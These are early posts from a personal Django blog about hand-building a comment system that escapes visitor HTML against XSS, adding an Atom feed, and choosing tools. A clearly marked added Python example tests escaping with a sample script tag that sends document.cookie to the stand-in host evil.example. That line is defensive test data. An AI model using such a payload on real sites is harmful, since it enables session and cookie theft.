the elusive commenting system

BDT (yeah, third post in, already acronym-ising this thing) finally has one of them there commenting systems. Check it out below if you don’t believe me.

The delay

The reason I was holding back was that I wanted to “hand-roll” my system for maximum control. Yeah, this is a gross violation of “don’t reinvent the wheel” (Django has a comments module), but sometimes invention is fun even if you’re contributing nothing new to anything. My main motivation for spitting in the face of Django was that at some stage I want to play with Akismet. There are tutorials out there for adding Akismet to the existing comments system, however they all involve altering core Django code and I sorta felt that this could be a bit messy – particularly in terms of maintenance further down the line.

The problem

The Django API makes it a breeze to add a comment; the big problem comes in escaping stray HTML / JavaScript etc. I could write my own sanitiser – it probably wouldn’t be all that hard, but I would never want to reinvent the wheel (I’m banking on 90% of readers skimming the last paragraph). The only method out there in Django seems to be the one in the template system – and that’s only going to be directly useful in sanitising the main blog page, and only then if I explicitly tell it to on every template. It won’t stop somebody from submitting some code that messes about with my admin page, for example. But the method itself is useful: it is powerful, and in one call it neutralises any potential offensiveness in a string (by offensiveness I mean XSS etc., not the word “dick” – we wouldn’t want to prevent people from commenting about their favourite British pudding now, would we?).

The solution

PS: I stumbled upon this idea while surfing, but cannot remember where; if you were the originator, tell me and I’ll give due credit.

To harness the escape method, first you need to hook into the django.template module – specifically the Parser class (I was stumbling about aimlessly in the python shell when I finally cracked this one, there is probably a better way of doing this). From an instance of Parser you call the find_filter method, which returns the escape filter function, and you can then use that at will. One caveat worth checking on your Django version: from 1.0 onwards the escape filter no longer escapes immediately but only marks the string for escaping at render time (force_escape, or django.utils.html.escape called directly, escapes eagerly), so look at what the returned function actually gives you before saving it to the database. Sticking this in your “add a comment” view would look a little like this:

from django.template import Parser

# ...ace django code goes here...

# Parser only wants a token list, and an empty one is enough to get the
# built-in filter library registered – no need to feed it a string.
p = Parser([])
esc = p.find_filter("escape")   # the same callable the template engine uses
# On 0.96-era Django this returns the escaped string; on 1.0+ the escape
# filter only *marks* the value for later escaping, so use
# django.utils.html.escape directly there.
new_comment.content = esc(new_comment.content)

# ...more ace django code...

note to self: find / implement a “code” template module. Preferably with syntax highlighting built in.

Obviously, you’ll want to do some content checks and the like, but you get the general idea. I am of the opinion that if you are not super paranoid about what you let into an effectively open database then you are asking for trouble. If you need further proof (beyond common sense), look at all of the trouble myspace have had over the years.
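An added example (not the original post’s code, and not Django’s): a standard-library stand-in for Django’s escape filter, used to show what happens to a comment when it is escaped on the way into the database, as above, and then rendered by a template that does or does not escape it again. The `django_escape` function reproduces the five replacements `django.utils.html.escape` makes (an assumption made so the script runs without Django installed), and the two sample comments are constructed for the demonstration.

```python
import html  # only used to check that an escaped string is the original escaped once


def django_escape(text):
    """Stand-in for django.utils.html.escape (assumed replacement set, written
    from memory of the Django source so this runs without Django installed).
    Ampersand goes first so the entities introduced below are left alone."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("'", "&#39;"))


# Constructed sample comments: a cookie-stealing script tag, and an innocent
# one that happens to use several of the characters the escaper touches.
SAMPLE_COMMENTS = [
    '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    "Spotted dick > treacle sponge & I'll fight anyone who says otherwise",
]


def render(raw, escape_on_input, autoescape):
    """Run a comment through the two places escaping can happen and return
    the text that ends up in the HTML page.

    escape_on_input: the post's approach, escape before saving to the DB.
    autoescape:      what the template does on output (off in 0.96-era
                     templates, the default from Django 1.0 onwards)."""
    stored = django_escape(raw) if escape_on_input else raw
    return django_escape(stored) if autoescape else stored


def classify(raw, rendered):
    """Say how many rounds of escaping the visitor's text went through.
    html.unescape undoes exactly one round, so if that gets the original
    back the text was escaped once; if not, it was escaped twice."""
    if rendered == raw:
        return "not escaped"
    if html.unescape(rendered) == raw:
        return "escaped once"
    return "double-escaped"


def matrix(raw):
    """All four input/output combinations for one comment."""
    return {
        (escape_in, auto): classify(raw, render(raw, escape_in, auto))
        for escape_in in (False, True)
        for auto in (False, True)
    }


if __name__ == "__main__":
    for raw in SAMPLE_COMMENTS:
        print(repr(raw))
        for (escape_in, auto), verdict in matrix(raw).items():
            print(f"  escape on input={escape_in!s:5} autoescape={auto!s:5} -> {verdict}")
        print("  stored as:", render(raw, True, False))
```

The combination to watch for is escape-on-input plus an auto-escaping template: the visitor’s `<` comes out as `&amp;lt;`, visibly mangled, and a `<script>` that was never escaped at all is only caught if one of the two stages runs. Either escape once on input and mark the stored value safe when rendering, or store the raw text and let the template escape it at output; the latter also keeps feeds, plain-text e-mail and later edits working on the text the visitor actually typed. Escaping also only neutralises markup in an HTML text context: a `javascript:` URL dropped into an `href` attribute passes through `escape` untouched, so a comment’s website field needs a scheme check as well.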

Still to come…

hmmmm, somehow this has formed itself into BDT’s first “proper” entry, I should probably have planned it better. Anyway, next on my list are per-category feeds, a bit of an “about” section and then some playing with Django vs Jabber interactivity. Should be fun, yay!


keeping this thing updated

…is a royal pain in the bollock. Figure I should give a small checklist of what Si has been working on:

XML Feed

I have just finished implementing an Atom feed for this mofo. It was ridiculously simple using Django – create a feed class, point the url file at it and you’re away. I think I will have to stick some per-category feeds in because that was waaaay too easy.

Comments System

I am working on getting a comments system sorted ASAP, I think the power of blogging is in the dialogue – without it you have a glorified ego-wank. The aforementioned feed will not be going live until this is all cleared and working.

Super hyper mega WEB APP!!!

Hayley and me – we had one of them $5 ideas* that she swears is gonna make us a million. I am not so sure. I just want to be able to say that I have successfully deployed a working web application, rather than being a dumb simpleton who has no idea of the rigours involved. The app itself is pretty useless to anyone not of the myspace generation and it took me just 45 minutes to manufacture a proof of concept (again – thanks to my boyfriend, Django) – but there is always a chance that Fox will give me £50 for it within the next 10 months, therefore making me a profit on my hosting. Wooyay.

* ok, it’s probably closer to 50p.

So yeah – still plenty on my plate. The next post will hopefully be about this mysterious wAPP (saying it aloud like that is strangely satisfying), if not inviting you – my non-readers – to leave a comment.


And so it begins

Yup – a pretty uninspired first post title, and what’s probably going to be an equally uninspired first post – but what the heck, I don’t see people reading this for a while now anyway. Basically I have been pissing about with various development tools on my own boxes for about 9 months now, I’ve gone through everything – PHP, Python, Ruby, Codeigniter, CakePHP, Dotnet, Visual Studio, Eclipse, VIM, Aptana… I’ve experimented with lots of different types of programming – AI, GUI, Linux, Win32, server-side, client-side, IM bots, games… and I’ve decided it’s about time I started putting stuff out there myself instead of leeching off of others’ hard sweat. With stuff being, “mistakes I have made that others may not have to”.

Python, Django Vim…I choose you!

Having battled through, I have finally achieved my desired set-up – or at least the one I am going to pursue for personal development in the foreseeable future. My lingo of choice is Python – I have selected it because it feels like I can simply imagine code and it works. I like that. I’m not arsed about speed or any of those BS metrics, I just want to see stuff happen. (Although I have never had any troubles with Python regarding those sorts of things either.)

I planned on trying all of the Python frameworks (Turbogears, CherryPy, Zope etc.) but with Django it was love at first sight. It was so easy that it felt like cheating, and I am not one to feel guilty for living an easier life. If PHP was my only choice then Codeigniter would have been my way forward, but Python / Django seems to be gaining more acceptance with hosts and that looks to further pick up as it reaches that magical 1.0 release.

I have been really persevering with VIM for a while now and am now seeing the results. I wanted an editor which I could customise in any way I want, and having upgraded to version 7 I really don’t see anything it won’t let me do. Expect some scripts of beyond-dubious quality to be published on here as I start scripting stuff which I haven’t just ripped off some innocent French dude.

And finally…

Posts will inevitably stray off topic so don’t subscribe if you want pure technical writing (HAHAHAHA!!!!). Fanboyism is a disease – I consider myself OS-agnostic (they’re all quite pretty now, it all comes down to what I can afford / steal easily). I’m not big on memes – if there are 5 things you don’t know about me it is simply because I don’t want you to. The design of this blog will improve / change / mutate incrementally (with emphasis on the third, fourth and fifth syllables of that word) as I add features, currently I have just stuck in the bare bones. There’s not even an RSS feed yet let alone any sort of commenting. I won’t start pushing this / linking back until at LEAST those two features are implemented.

Last night I: signed up for hosting with webfaction.